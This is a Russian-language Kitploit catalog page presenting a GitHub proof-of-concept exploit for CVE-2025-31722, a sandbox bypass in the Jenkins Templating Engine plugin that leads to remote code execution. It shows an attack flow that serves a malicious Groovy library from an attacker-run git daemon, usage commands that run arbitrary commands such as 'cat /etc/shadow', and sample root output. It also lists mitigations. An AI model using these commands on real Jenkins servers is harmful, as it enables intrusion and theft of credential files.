Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-31722 — Эксплойт, подтверждающий концепцию, для обхода песочницы плагина Jenkins Templating Engine (CVE-2025-31722), позволяющий удаленное выполнение кода через внедрение вредоносной библиотеки Groovy. | Kitploit
Инструменты/GitHubGitHub/h3raklez/cve-2025-31722
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubh3raklez/cve-2025-31722

CVE-2025-31722

Эксплойт, подтверждающий концепцию, для обхода песочницы плагина Jenkins Templating Engine (CVE-2025-31722), позволяющий удаленное выполнение кода через внедрение вредоносной библиотеки Groovy.

Репозиторий
346 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-31722 — RCE движка шаблонов Jenkins

Только для образовательных целей и авторизованных исследований безопасности.

Описание

Уязвимость обхода песочницы в плагине Jenkins Templating Engine (JTE) <= 2.5.3, позволяющая пользователю с низкими привилегиями выполнять произвольный код на сервере Jenkins.

Ошибка возникает из-за того, что JTE загружает библиотеки из внешнего git-репозитория, заданного в конфигурации GovernanceTier на уровне папки, и выполняет шаги из этих библиотек вне песочницы Groovy, независимо от уровня привилегий пользователя, создавшего задачу.

CVSS: 8.8 (Высокий)
Тип: Обход песочницы → RCE
Затронутый компонент: плагин pipeline-templating-engine ≤ 2.5.3
Исправленная версия: 2.5.4+


Схема атаки

root@kitploit:~
Attacker (Kali)                          Jenkins Server
───────────────                          ──────────────
1. Creates git repo with evil.groovy
2. Starts git daemon on :9418
3. Creates folder in Jenkins        →    Folder with GovernanceTier
   pointing to git://KALI:9418/…         pointing to attacker's repo
4. Creates job with AdHoc template  →    Job calls evil()
5. Triggers build                   →    JTE clones repo from Kali
                                         Executes evil() outside sandbox
                                    ←    RCE as Jenkins user

Требования

Сервер Jenkins (цель)

  • Jenkins с установленным плагином Templating Engine 2.5.3
  • Плагины: cloudbees-folder, git, workflow-aggregator
  • CSRF отключён
  • Пользователь attacker с разрешениями: Item/READ, Item/CREATE, Item/CONFIGURE, Item/BUILD
  • Встроенный узел онлайн с как минимум 1 исполнителем
  • Исходящее сетевое соединение от сервера к IP атакующего на порт 9418

Машина атакующего (Kali)

  • Python 3.8+
  • установлен git
  • Порт 9418 доступен с сервера Jenkins
  • Библиотека Python: requests
root@kitploit:~
pip install requests

Настройка лаборатории

Установка на сервере Debian/Ubuntu включала установку Jenkins, настройку пользователей, разрешений и необходимых плагинов. Она не создаёт никакого вредоносного содержимого — этим занимается исключительно PoC.


Использование

Базовая эксплуатация

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP>

Пользовательская команда

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cmd "cat /etc/shadow"

Очистка

root@kitploit:~
python3 exploit.py \
  --url http://<JENKINS-IP>:8080 \
  --user attacker \
  --pass attacker123 \
  --git-host <KALI-IP> \
  --cleanup

Параметры

ПараметрОписаниеОбязателен
--urlJenkins базовый URLДа
--userПользователь с разрешениями Item/CREATE+CONFIGURE+BUILDДа
--passПароль пользователяДа
--git-hostIP Kali, доступный с JenkinsДа
--cmdКоманда для выполнения на сервере (по умолчанию: id && hostname && cat /etc/passwd)Нет
--cleanupУдаляет папку, задачу и репозиторий, созданные эксплойтомНет

Как работает PoC

  1. setup_repo() — Создает ~/jte-exploit/evil-lib/steps/evil.groovy на Kali с командой для выполнения
  2. start_git_daemon() — Запускает git daemon на Kali на порту 9418
  3. create_folder() — Создает папку в Jenkins с GovernanceTier, указывающим на git://KALI:9418/jte-exploit
  4. create_job() — Создает задачу с AdHocTemplateFlowDefinition, которая объявляет evil-lib и вызывает evil()
  5. trigger_and_wait() — Запускает сборку и ожидает результат
  6. print_output() — Отображает вывод консоли с результатом RCE

Git-демон остается активным на протяжении всего цикла сборки и автоматически завершается после завершения сборки.


Ожидаемый вывод

root@kitploit:~
=================================================================
  CVE-2025-31722 — Jenkins Templating Engine RCE
  Target  : http://10.211.55.10:8080
  Git host: 10.211.55.7
  Command : id && hostname && cat /etc/passwd
=================================================================

[+] Authenticated as: attacker (id=attacker)
[+] Repo created: /root/jte-exploit
[+] Malicious step: evil-lib/steps/evil.groovy
[+] Git daemon running at git://10.211.55.7:9418/jte-exploit
[+] Folder created
[+] Job created
[+] Build queued

=================================================================
  CVE-2025-31722 — RCE OUTPUT
=================================================================
[JTE] ...
uid=0(root) gid=0(root) groups=0(root)
debian
root:x:0:0:root:/root:/bin/bash
...
=================================================================

Смягчение

  • Обновите плагин Templating Engine до версии 2.5.4 или новее
  • Ограничьте разрешения Item/CREATE и Item/CONFIGURE только для доверенных пользователей
  • Включите защиту CSRF в Jenkins
  • Проверьте папки с конфигурациями GovernanceTier, указывающими на внешние репозитории

Ссылки

  • Официальное уведомление безопасности Jenkins
  • Репозиторий JTE Plugin на GitHub

Правовое предупреждение: Данный PoC предназначен исключительно для образовательных целей и тестирования в контролируемых средах. Использование его против систем без явного разрешения незаконно.

Скачать инструмент